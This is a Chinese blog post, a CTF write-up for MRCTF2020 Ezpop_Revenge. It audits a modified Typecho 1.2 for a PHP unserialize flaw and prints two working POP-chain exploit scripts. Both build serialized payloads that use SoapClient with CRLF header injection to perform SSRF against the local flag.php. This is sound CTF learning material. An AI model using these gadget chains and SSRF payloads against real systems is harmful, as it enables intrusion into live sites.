代码审计_MRCTF_typecho 反序列化

最新推荐文章于 2023-03-06 18:56:30 发布
最新推荐文章于 2023-03-06 18:56:30 发布
阅读量869 收藏
点赞数 1
分类专栏: BUUCTF web 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/crisprx/article/details/105519736
版权

[MRCTF2020]Ezpop_Revenge

0x01 前言

感觉代码审计需要不断练习,提高自己看代码的能力,这次从两条pop链来分析反序列化漏洞吧。

0x02 正文

这个题是一个typecho 1.2的框架,扫目录发现www.zip源码泄露,下载后进行审计,看到flag.php:

<?php
if(!isset($_SESSION)) session_start();
if($_SERVER['REMOTE_ADDR']==="127.0.0.1"){
   $_SESSION['flag']= "MRCTF{******}";
}else echo "我扌your problem?\nonly localhost can get flag!";
?>

大概率要打SSRF,而且RCE的函数都被过滤了,看了typecho 1.1的反序列化漏洞,想看看install.php有没有漏洞或者说是被修复了没有,结果发现整个文件夹都被删了,既然觉得是反序列化漏洞的话,那就从关键函数回溯

关键函数回溯也是代码审计中比较重要的一环,面对代码量很大的文件不妨一试

全局搜索unserialize发现:在这里插入图片描述
应该是找到入口点了,贴下主要代码:

public function action(){
        if(!isset($_SESSION)) session_start();
        if(isset($_REQUEST['admin'])) var_dump($_SESSION);
        if (isset($_POST['C0incid3nc3'])) {
			if(preg_match("/file|assert|eval|[`\'~^?<>$%]+/i",base64_decode($_POST['C0incid3nc3'])) === 0)
				unserialize(base64_decode($_POST['C0incid3nc3']));
			else {
				echo "Not that easy.";
			}
        }
    }

接着看一下这个类是一个插件,既然是插件的话应该设置了路由和接口,先不着急,紧接着发现:

class HelloWorld_DB{
    private $flag="MRCTF{this_is_a_fake_flag}";
    private $coincidence;
    function  __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
    }

__wakeup()方法摆在这里,那应该就是从而进行反序列化了,触发__wakeup后,跟进Typecho_Db

跟进后贴上关键代码,$adatpterName看到会被当成字符串echo且是可控的,自然想到如果$adatpterName是某一个类的话,则会触发该类的__toString()方法.
在这里插入图片描述
接下来我们全局搜索__toString()方法

Pop链 1

因为__toSrting()方法有多个类中存在,这里有两条链可以利用,因此从这里开始分别分析。

Typecho_Db_Query类中发现该魔术方法,关键点在这:
在这里插入图片描述
知道当$this->_sqlPreBuild['action']SELECT时,则会return $this->_adapter->parseSelect($this->_sqlPreBuild);而如果我们将$_adapter设置为一个类,而这个类没有parseSelect方法,则会触发__call()方法,考虑到此处还有进行SSRF,自然想到了利用SoapClient这个PHP的原生类,触发其__call()方法从而进行SSRF

贴上判断原生类的魔术方法

<?php
$classes = get_declared_classes();
foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            '__destruct',
            '__toString',
            '__wakeup',
            '__call',
            '__callStatic',
            '__get',
            '__set',
            '__isset',
            '__unset',
            '__invoke',
            '__set_state'
        ))) {
            print $class . '::' . $method . "\n";
        }
    }
}

因此我们的第一条链就出来了:

HelloWorld_DB::wakeup–>Typecho_Db::__construct(tostring)–>Typecho_Db_Query::__construct–>(this->_adapter=new Soapclient)–>
SSRF

EXP:

<?php
class HelloWorld_DB{
    private $coincidence;
    function  __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
	}
	
	public function __construct()
	{
		$this->coincidence['hello'] = new Typecho_Db_Query();
		$this->coincidence['world'] = 'crispr';
	}
}

class Typecho_Db{
	private $_adapterName;
	private $_prefix;
	public function __construct( $prefix = 'typecho_')
    {
		/** 获取适配器名称 */
		$adapterName = new Typecho_Db_Query() ;
        $this->_adapterName = $adapterName;

        /** 数据库适配器 */
        $adapterName = 'Typecho_Db_Adapter_' . $adapterName;
	}
}
class Typecho_Db_Query{
	private $_sqlPreBuild;
	private $_prefix;
	private $_adapter;
	public function __toString()
    {
		return $this->_adapter->parseSelect($this->_sqlPreBuild);
	}
	public function __construct()
    {
		$target = "http://127.0.0.1/flag.php";
        $headers = array(
            'X-Forwarded-For:127.0.0.1',
            "Cookie: PHPSESSID=skdpjb9j5loauj48q58gfj00q2"
        );
        $this->_adapter = new SoapClient(null, array('uri' => 'crispr', 'location' => $target, 'user_agent' => "crispr\r\n" . join("\r\n", $headers)));
        $this->_sqlPreBuild['action'] = "SELECT";
    }
    }
$obj = new HelloWorld_DB();
$payload = urlencode(base64_encode(serialize($obj)));
echo $payload;

这里还需要触发最开始的action()方法,去查一下路由发现:
在这里插入图片描述

addRoute接口,可以往typecho里面添加特定的路由策略,进而将url请求重定向到自己的控制器或者插件上。

代码意思就是:添加一条路由,将xxxxxxx.com/index.php/page_admin的请求发送到HelloWorld_Plugin这个action()上,因此我们访问这个目录就能触发了。

在这里插入图片描述

Pop链 2

可以参考FreeBuf的typecho反序列化漏洞,这里我们也跟着分析

还是从__toString()方法入手,Pop 1链 选取的是Query.php,而这里我们看一下另一个Feed.php的__toSrting(),跟进查看:
在这里插入图片描述
触发第二个需要self:RSS2 == $this->_type这个好绕过,接下来发现$item['author']->screenName$item其实是私有属性

当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。

如果我们给$item['author']设置的类中没有$screenName就会执行该类的__get()方法,全局搜索该方法:
在这里插入图片描述
跟进get()方法:
在这里插入图片描述
这里我们只需要设置$this->_params['screenName']就能将值赋给$value,作为变量传到_applyFilter()中,跟进:
在这里插入图片描述
当我们设置了$_filter后,会调用call_user_func(),而且其两个参数都是我们可控的,原版的typecho可以直接进行RCE,此处我们将$filter设成call_user_func而为什么要再用一遍呢?因为我们要调用__call()方法,而直接call_user_func,只会将第一个参数设成方法名,第二个参数为方法的参数,如果filter=call_user_func$value=array('SoapClient','2333')

call_user_func会将数组的成员当做类名和方法,而并没有定义此方法,所以会调用自带的__call()函数,成功发送请求进行SSRF

因为SoapClient没有2333方法,成功调用__call()达到SSRF的目的。
EXP附上出题大佬eki写的:

<?php
class HelloWorld_DB{
    private $flag="MRCTF{this_is_a_fake_flag}";
    private $coincidence;
    function __construct($coincidence){
        $this->coincidence = $coincidence;
    }
    function  __wakeup(){
        $db = new Typecho_Db($this->coincidence['hello'], $this->coincidence['world']);
    }
}
class Typecho_Request{
    private $_params;
    private $_filter;
    function __construct($params,$filter){
        $this->_params=$params;
        $this->_filter=$filter;
    }
}
class Typecho_Feed{
    private $_type = 'ATOM 1.0';
    private $_charset = 'UTF-8';
    private $_lang = 'zh';
    private $_items = array();
    public function addItem(array $item){
        $this->_items[] = $item;
    }
}

$target = "http://127.0.0.1/flag.php";
$post_string = '';
$headers = array(
    'X-Forwarded-For: 127.0.0.1',
    'Cookie:PHPSESSID= np88gihrs5gepiou717rit3dh4'
);

$a = new SoapClient(null,array('location' => $target,
                                'user_agent'=>"eki\r\nContent-Type: application/x-www-form-urlencoded\r\n".join("\r\n",$headers)."\r\nContent-Length: ".(string)strlen($post_string)."\r\n\r\n".$post_string,
                                'uri'      => "aaab"));

$payload1 = new Typecho_Request(array('screenName'=>array($a,"233")),array('call_user_func'));
$payload2 = new Typecho_Feed();
$payload2->addItem(array('author' => $payload1));
$exp1 = array('hello' => $payload2, 'world' => 'typecho');
$exp = new HelloWorld_DB($exp1);

echo urlencode(base64_encode(serialize($exp)));
Crispr-bupt
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
typecho反序列化漏洞复现
weixin_44005410的博客
05-21 1972
0x01前言 再杭州西湖线下打AWD的时候web1就是这个漏洞,在这里复现一下,刚好巩固一下前几天学习的反序列化漏洞。 0x02漏洞分析 这是一个由unserialize()导致的一个反序列化漏洞,全局搜索unserialize(),在install.php的232行发现 <?php $config = unserialize(base64_decode(Typecho_Cookie::...
typecho图片插件_Ideal ——接近Typecho完美的插件
weixin_32401411的博客
02-04 2300
说明:有的时候需要给博客添加一个一个特效什么,难道只能修改主题源代码吗?这样也太讽刺了。而且主题每次更新功能,虽然没必要更新。如果要更新,恐怕还得坐着在电脑面前我改了什么,哦,我改了头部。咦?我不只是改了头部吗,这特么啥情况??样式怎么匹配不上了,我勒个擦擦!!删除了,容我好好想想;这里... 还有这里...(一个小时过去)结果【Database Server Error】插件简介Ideal史前,...
刷题(第二周)
qq_62046696的博客
03-06 746
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
2019UNCTF-竞技赛 部分WP
A_dmin的博客
10-30 3187
UNCTF-竞技赛 部分WP
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 3027
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
[MRCTF2020]Ezpop
SopRomeo的博客
04-16 2310
Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Cra...
CTF 第一次接触智能合约(主要描述一下操作流程)
a3320315的博客
03-31 2951
合约地址 0x421DbB4ca0Fdb1872e5780BD95743085357CD7B8 源代码 pragma solidity ^0.4.23; contract Trans{ string flag; mapping(address => uint256) balances; constructor () public { fla...
Leisure-master.zip_QBB_leisure_typecho_typecho master
09-24
总的来说,"Leisure-master.zip_QBB_leisure_typecho_typecho master"代表了一款专为Typecho博客系统设计的休闲风格主题,它提供了一种独特的视觉体验和可能的互动功能,使得用户可以轻松创建一个既美观又个性化的...
clean-home.zip_Home Home_typecho
09-23
《Clean Home:打造优雅的Typecho博客主题》 在互联网世界中,博客作为一个个人或团队表达观点、分享知识的重要平台,其设计与布局对于吸引读者、提升用户体验具有至关重要的作用。Typecho是一款轻量级、易用且强大...
malio配置KFC支付_malio主题_payment支付_typecho_malio_
10-02
【标题】"malio配置KFC支付_malio主题_payment支付_typecho_malio_" 提供的信息主要涉及Malio主题在Typecho博客系统中的支付功能配置,特别是与肯德基(KFC)支付方式的集成。Malio是一个针对Typecho的第三方主题,...
GKCTF2020WEB篇 wp
qq_43571759的博客
05-27 1774
GKCTF2020 WEB wp 文章目录GKCTF2020 WEB wp[GKCTF2020]CheckIN----bypass disable_functions[GKCTF2020]老八小超市儿----shopxo后台上传[GKCTF2020]cve版签到----CVE-2020-7066%00截断[GKCTF2020]EZ三剑客-EzWeb----SSRF和redis5.X未授权漏洞redis未授权漏洞复现[GKCTF2020]EZ三剑客-EzNode----Nodejs内置函数特性[GKCTF
GKCTF 2020(web)
weixin_43610673的博客
05-25 634
菜逼只能赛后复现 CheckIN Base64后即可rec,可以读文件,但不知道flag文件位置 看一下phpinfo 命令执行的函数都给ban完了 用蚁剑链接?Ginkgo=ZXZhbCgkX1BPU1RbY21kXSk7 连接成功之后根目录有readflag,和flag 那就是要执行readflag文件 PHP 7.0-7.3 disable_functions bypasss 直接打 改一下命令就行 Exp要传到/tmp 目录 别的没权限 页面去包含执行 老八小超市儿 和这个基本差不多
CTF线下赛AWD总结
热门推荐
YICONGITSME的博客
09-20 3万+
AWD     记录一下自己最近参加的线下攻防比赛,没时间学习了,就准备了几天,果然不出意外的被安全专业的大佬打得很惨。 缺点是不会攻击,我和我队友两个人就只有防,AWD防了400分,综合渗透拿了200分。 感觉自己的知识欠差很多,代码审计能力弱,写脚本能力弱,sql注入我一直学不会。最重要的是比赛前没有真正练习过,所以比赛时才没把技能发挥出来。谨记:多实践,学好代码审计,sql注入...
re学习笔记(55)MRCTF-re-Transform | 撸啊撸
逆向随笔
03-30 4187
Transform 这一题比较简单,IDA64位载入,进入main函数看到有效代码 写脚本解密 #include <stdio.h> unsigned char data2[33] = { 0x67, 0x79, 0x7B, 0x7F, 0x75, 0x2B, 0x3C, 0x52, 0x53, 0x79, 0x57, 0x5E, 0x5D, 0x42, 0x7B, 0x2D...
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6328
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
[BUUCTF]第五天训练日志
Y1seco的博客
08-07 500
文章目录反序列化[GYCTF2020]Easyphp知识点WPbestphp's revenge知识点WP反思 反序列化 [GYCTF2020]Easyphp 知识点 PHP反序列化字符逃逸: PHP在进行反序列化的时候,只要前面的字符串符合反序列化的规则并能成功反序列化,那么将忽略后面多余的字符串 WP 源码泄露www.zip,解压发现php文件lib.php和update.php可以利用 update.php是输出flag <?php require_once('lib.php'); ech
BUU刷题记录——7
weixin_43610673的博客
02-20 3640
[b01lers2020]Space Noodles 根据页面提示,POST访问 按照提示访问最后拼接字符串即可 [网鼎杯 2020 半决赛]faka 关键字:未授权,任意文件读取 /admin 进入后台登录页面 下载源码审计,由于已经发现了后台地址,先查看application/admin/controller/Index.php,看看能否以admin身份登录 可以看到pass()方法中有着诸多验证项,而下面的info()并无要求 未登录无session,id不传值得话就可以进入if语句,跟进_fo
BUU刷题记录——3
weixin_43610673的博客
08-31 866
[SWPUCTF 2018]SimplePHP 可以上传到找不到上传的文件 http://05de1970-8bf0-44cd-ba69-44dd2d41c86a.node3.buuoj.cn/file.php?file=upload_file.php 直接就可以从?file读源码,还用伪协议试了半天不行。。。 先看下function.php的内容 看源码得知上传的文件在/upload/目录下 文件名只能是几种图片格式 主要代码在class.php <?php class
九、漏洞挖掘与代码审计(3)反序列化漏洞
weixin_45540609的博客
05-21 493
一、反序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 序列化就是将对象的状态信息转为字符串储存起来,那么反序列化就是再将这个状态信息拿出来使用。(重新再转化为对象或者其他的)【将字符串转化为状态信息】 ..
debian安装typecho
最新发布
04-29
define('__TYPECHO_DB_USER__', 'typecho_user'); /** 数据库的密码 */ define('__TYPECHO_DB_PASSWORD__', 'password'); /** 数据库的名称 */ define('__TYPECHO_DB_NAME__', 'typecho'); ``` 请将 'typecho_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值